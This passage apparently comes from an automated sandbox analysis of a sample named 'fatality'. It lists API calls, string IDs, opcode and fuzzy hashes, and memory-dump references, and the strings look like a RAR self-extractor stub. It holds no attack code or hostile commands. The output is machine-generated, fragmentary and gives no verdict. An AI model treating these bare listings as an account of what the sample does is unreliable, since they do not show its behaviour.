                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                            • API String ID: 176396367-3743748572
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0090C868: _free.LIBCMT ref: 0090C891
                                                                                                                                                            • _free.LIBCMT ref: 0090C8F2
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090C8FD
                                                                                                                                                            • _free.LIBCMT ref: 0090C908
                                                                                                                                                            • _free.LIBCMT ref: 0090C95C
                                                                                                                                                            • _free.LIBCMT ref: 0090C967
                                                                                                                                                            • _free.LIBCMT ref: 0090C972
                                                                                                                                                            • _free.LIBCMT ref: 0090C97D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008F05DA: _wcslen.LIBCMT ref: 008F05E0
                                                                                                                                                              • Part of subcall function 008EB92D: _wcsrchr.LIBVCRUNTIME ref: 008EB944
                                                                                                                                                            • _wcslen.LIBCMT ref: 008EC197
                                                                                                                                                            • _wcslen.LIBCMT ref: 008EC1DF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$_wcsrchr
                                                                                                                                                            • String ID: .exe$.rar$.sfx
                                                                                                                                                            • API String ID: 3513545583-31770016
                                                                                                                                                            APIs
                                                                                                                                                            • LoadBitmapW.USER32(00000065), ref: 008FB6ED
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 008FB712
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FB744
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FB767
                                                                                                                                                              • Part of subcall function 008FA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008FA762
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                                                                                                            • String ID: ]
                                                                                                                                                            • API String ID: 3658976889-3352871620
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FD64B
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008FD661
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 008FD675
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 008FD684
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: RENAMEDLG
                                                                                                                                                            • API String ID: 445417207-3299779563
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090C817
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090C829
                                                                                                                                                            • _free.LIBCMT ref: 0090C83B
                                                                                                                                                            • _free.LIBCMT ref: 0090C84D
                                                                                                                                                            • _free.LIBCMT ref: 0090C85F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: 1e2f8c468aaf6b1ce3c3d3440e98a0ae005adfac69e60a4dddd39603d0da47dc
                                                                                                                                                            • Instruction ID: 0f2a02c01664e409650dac7cb37d982ae9a6845e503276a70121eee6536e1cbc
                                                                                                                                                            • Opcode Fuzzy Hash: 1e2f8c468aaf6b1ce3c3d3440e98a0ae005adfac69e60a4dddd39603d0da47dc
                                                                                                                                                            • Instruction Fuzzy Hash: ACF06272724201AFC620DB68E489D4B77EDBB40B10B548919F949D75D2CB70FC80CA58
                                                                                                                                                            APIs
                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                            • IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1266772231-0
                                                                                                                                                            • Opcode ID: 0a0c418210da7fc7c22ceb6bef38b600d37a12832a976ed93efdc2c1c4c0111b
                                                                                                                                                            • Instruction ID: 734d87d3a6db3f09f543d2fad09e103fe726afcefcde0c7d0bb7a9190bad7e37
                                                                                                                                                            • Opcode Fuzzy Hash: 0a0c418210da7fc7c22ceb6bef38b600d37a12832a976ed93efdc2c1c4c0111b
                                                                                                                                                            • Instruction Fuzzy Hash: 92F0D075A1511AAB8B20AFF5DC4CDEB7FBCEE063917008515B505D2050EB38D605DBB0
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090891E
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 00908930
                                                                                                                                                            • _free.LIBCMT ref: 00908943
                                                                                                                                                            • _free.LIBCMT ref: 00908954
                                                                                                                                                            • _free.LIBCMT ref: 00908965
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: f9c8a9a16d0efc1685209b63f5c229e7c2ace5ed2d670fc9b4120544b6616f55
                                                                                                                                                            • Instruction ID: e6f38b9c1e76204bfaac0be122928f58eb429bdeaea1d81e9320e26a15e166b1
                                                                                                                                                            • Opcode Fuzzy Hash: f9c8a9a16d0efc1685209b63f5c229e7c2ace5ed2d670fc9b4120544b6616f55
                                                                                                                                                            • Instruction Fuzzy Hash: A2F05E79A382238FC60A7F14FC0694A3FB5F7267107810706F868522F1CB714941FB81
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EB690: _wcslen.LIBCMT ref: 008EB696
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FCED1
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,0092946A), ref: 008FCEF1
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FCFFE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DialogItemText_swprintf_wcslen
                                                                                                                                                            • String ID: %s%s%u
                                                                                                                                                            • API String ID: 2997164916-1360425832
                                                                                                                                                            • Opcode ID: 16b32bc806b1fff6ddf31ec363ca79d7539a1940791714950fd09e332cf2f9ee
                                                                                                                                                            • Instruction ID: 3a8aeada7b2b8a3f619dabc284e4b2e9cfc36d8c615e0b55c27f910a8fa4a413
                                                                                                                                                            • Opcode Fuzzy Hash: 16b32bc806b1fff6ddf31ec363ca79d7539a1940791714950fd09e332cf2f9ee
                                                                                                                                                            • Instruction Fuzzy Hash: 174192B190065DAADF24AB64CC45EFA77BCFB45304F4080A6FB09E7151EE708A85DF62
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: UNC$\\?\
                                                                                                                                                            • API String ID: 176396367-253988292
                                                                                                                                                            • Opcode ID: 19ef7eca80de6992f99b0109af0e7d87d228709d837595674bcdf4186542b747
                                                                                                                                                            • Instruction ID: 7bf9ab8078647d469414958ad5621c8981205a9377a29db309008579486e31c2
                                                                                                                                                            • Opcode Fuzzy Hash: 19ef7eca80de6992f99b0109af0e7d87d228709d837595674bcdf4186542b747
                                                                                                                                                            • Instruction Fuzzy Hash: FA41D23150429DAACF21AF66CC01EEB77B8FF46394F208026F954F3151DBB4EA90CA61
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FAD98
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008FADAD
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 008FADC2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                            • API String ID: 445417207-3402441367
                                                                                                                                                            • Opcode ID: 804afa85ed03db165e0d748db4430aa02c2abe9c047b4f2ffeed38e9af55834b
                                                                                                                                                            • Instruction ID: 978f18ff63b0d696bf5215b3d63ef53089d681cdd365f9af4c4e1f20bf2c36cc
                                                                                                                                                            • Opcode Fuzzy Hash: 804afa85ed03db165e0d748db4430aa02c2abe9c047b4f2ffeed38e9af55834b
                                                                                                                                                            • Instruction Fuzzy Hash: F811D672284208AFD715AFB8EC45F7A7769FF4B752F004100F344DB5A0C761A945A723
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FB2BE
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008FB2D6
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 008FB304
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                            • Opcode ID: 04bd15d6e27c8d27e3b14b6147a58ca05478d28dd0c86a08b805d02e22db3309
                                                                                                                                                            • Instruction ID: 8c35bd90ed72ca5752e3b2d151ef87c97b1f9ac2c71fc13cae340dcea9a6b3cc
                                                                                                                                                            • Opcode Fuzzy Hash: 04bd15d6e27c8d27e3b14b6147a58ca05478d28dd0c86a08b805d02e22db3309
                                                                                                                                                            • Instruction Fuzzy Hash: F811AD32A4411CBADB229AB8DC49FFE77ACFB5A754F104020FB45F3180C7B59A4597A1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                            • API String ID: 0-56093855
                                                                                                                                                            • Opcode ID: 1c284e13f68f8e7cfbb815199b3555f2af3db2bdc284e1750313c8c70788f5a3
                                                                                                                                                            • Instruction ID: 3d949d263fc499b0c87f04eb7b1dc6dce1ea4be007a2287a3ac8c3edb6d5eaa6
                                                                                                                                                            • Opcode Fuzzy Hash: 1c284e13f68f8e7cfbb815199b3555f2af3db2bdc284e1750313c8c70788f5a3
                                                                                                                                                            • Instruction Fuzzy Hash: EA015E7662834DAFD721AFB4EC44AAB7BAAF759358B004425FB05C2270D6319C51FBA0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                            • Opcode ID: 98236f3dd466f09c99f8155716da8a64a263ece1390e234139e0bc7a387919c7
                                                                                                                                                            • Instruction ID: 2e80245714198e35693f46607b2835c0d2f5c5d23e8a14e93ca5867b9c0c00c5
                                                                                                                                                            • Opcode Fuzzy Hash: 98236f3dd466f09c99f8155716da8a64a263ece1390e234139e0bc7a387919c7
                                                                                                                                                            • Instruction Fuzzy Hash: 4651D672600226AFEB298F14D849BBA77ACFF94310F24456DEC45876E1E731ED80D790
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _com_issue_error
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2162355165-0
                                                                                                                                                            • Opcode ID: 7dace81ec6efd4fd035d473262216ca1e2bb89e3d5c61d911a4e7287391fdf84
                                                                                                                                                            • Instruction ID: 5b8434b5a7af1cc0a2e98539684b1c084b040984afd93dba2f627f9c1e6d6b3b
                                                                                                                                                            • Opcode Fuzzy Hash: 7dace81ec6efd4fd035d473262216ca1e2bb89e3d5c61d911a4e7287391fdf84
                                                                                                                                                            • Instruction Fuzzy Hash: FE41A671A0421DABD7109F78C845BBEBBA8FF48710F148239FB15EB292D7349940C7A5
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                            APIs
                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FDC61
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FDC72
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FDC7C
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FDC86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4217535847-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                            APIs
                                                                                                                                                            • GetDC.USER32(00000000), ref: 008FA666
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 008FA675
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FA683
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 008FA691
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FA699: GetDC.USER32(00000000), ref: 008FA69D
                                                                                                                                                              • Part of subcall function 008FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008FA6A8
                                                                                                                                                              • Part of subcall function 008FA699: ReleaseDC.USER32(00000000,00000000), ref: 008FA6B3
                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 008FA83C
                                                                                                                                                              • Part of subcall function 008FAAC9: GetDC.USER32(00000000), ref: 008FAAD2
                                                                                                                                                              • Part of subcall function 008FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 008FAB01
                                                                                                                                                              • Part of subcall function 008FAAC9: ReleaseDC.USER32(00000000,?), ref: 008FAB99
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 1061551593-3887548279
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf
                                                                                                                                                            • String ID: %ls$%s: %s
                                                                                                                                                            • API String ID: 589789837-2259941744
                                                                                                                                                            • Opcode ID: 4cc6ef6a38ebc0b02d3b2d86f9520d1d01c4347a7997420d9c713c95ebd54364
                                                                                                                                                            • Instruction ID: c3c14d745f239869bf27e7b42840091fcc648bca15f660884d33c87d9193cbfe
                                                                                                                                                            • Opcode Fuzzy Hash: 4cc6ef6a38ebc0b02d3b2d86f9520d1d01c4347a7997420d9c713c95ebd54364
                                                                                                                                                            • Instruction Fuzzy Hash: D041A57538830CF6EE112AB48E4EF317665FB25B0CF244516F39AE84E1DAA75410BB1B
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E9387
                                                                                                                                                              • Part of subcall function 008EC29A: _wcslen.LIBCMT ref: 008EC2A2
                                                                                                                                                            • _swprintf.LIBCMT ref: 008E9465
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog_swprintf_wcslen
                                                                                                                                                            • String ID: rtmp%d
                                                                                                                                                            • API String ID: 4240179315-3303766350
                                                                                                                                                            • Opcode ID: d9686bbea79007b48af265c7d9f9430c3ba9a3e7d0aa7a47c3c0a74b791c1e52
                                                                                                                                                            • Instruction ID: fb5cb6b232ed3882e06b29d4632d38149d14ebf8b869d771a5a0ddac8289c0e9
                                                                                                                                                            • Opcode Fuzzy Hash: d9686bbea79007b48af265c7d9f9430c3ba9a3e7d0aa7a47c3c0a74b791c1e52
                                                                                                                                                            • Instruction Fuzzy Hash: A6418971900299A5CF21EB65CC45DEE737CFF56340F0088A5F68AE3051DB788B89DB61
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E7406
                                                                                                                                                              • Part of subcall function 008E3BBA: __EH_prolog.LIBCMT ref: 008E3BBF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                            • API String ID: 3519838083-639343689
                                                                                                                                                            • Opcode ID: df63e52e6cd61cb045cff85a79c24403c2e24b70a59e85499feef6627b8f3e04
                                                                                                                                                            • Instruction ID: 5cca81f490f9c562a71a2829bca83f7b846013c7a7b110357f4525e484915c0f
                                                                                                                                                            • Opcode Fuzzy Hash: df63e52e6cd61cb045cff85a79c24403c2e24b70a59e85499feef6627b8f3e04
                                                                                                                                                            • Instruction Fuzzy Hash: 6831D2B1E04298AADF21EBA9DC45BEE7BB8FF5A304F044015F405E7182C7748A84CB62
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: }
                                                                                                                                                            • API String ID: 176396367-4239843852
                                                                                                                                                            • Opcode ID: 1344702d2d95e567b436096be4f806c1c4888991b1f438059fc42666d06da364
                                                                                                                                                            • Instruction ID: 0ed8dbce94d5584a048818c888a5c8ccd2fd020bedd78324b82a58938528a200
                                                                                                                                                            • Opcode Fuzzy Hash: 1344702d2d95e567b436096be4f806c1c4888991b1f438059fc42666d06da364
                                                                                                                                                            • Instruction Fuzzy Hash: 3821DE7290430E5AD731AA78D945B7AB3ECEF95754F04042AF640C3141EB69DD4883A6
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf
                                                                                                                                                            • String ID: %c:\
                                                                                                                                                            • API String ID: 589789837-3142399695
                                                                                                                                                            • Opcode ID: ee945c2198c8028d3357b082495326df0c80176368d333bc33bc50440c2a9d83
                                                                                                                                                            • Instruction ID: 8d23762e2bd2b0314a7da9ee4971872aeed885736350c11421ccfa76e547e283
                                                                                                                                                            • Opcode Fuzzy Hash: ee945c2198c8028d3357b082495326df0c80176368d333bc33bc50440c2a9d83
                                                                                                                                                            • Instruction Fuzzy Hash: 8401F56350436179DA316B7B8C46E6BB7ACFFD3770B50851AF554D6082FB20D85082B1
                                                                                                                                                            APIs
                                                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 008FF47E
                                                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 008FF4C1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___scrt_is_nonwritable_in_current_image___scrt_uninitialize_crt
                                                                                                                                                            • String ID: VPWh
                                                                                                                                                            • API String ID: 2554503057-353207083
                                                                                                                                                            • Opcode ID: efa644ab2166baf05e9ed58277d2971d9a75add7947a8a0aa22cc12a000f03a4
                                                                                                                                                            • Instruction ID: f9c9449086d4a0deb6b12bd9cf7f465f27e8a10aa2fea480e3b72a2cbb87332a
                                                                                                                                                            • Opcode Fuzzy Hash: efa644ab2166baf05e9ed58277d2971d9a75add7947a8a0aa22cc12a000f03a4
                                                                                                                                                            • Instruction Fuzzy Hash: 17F0D632A087696ACA307BB89806F7E6B94FF81760F14093AF791F72D3CE655C008559
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
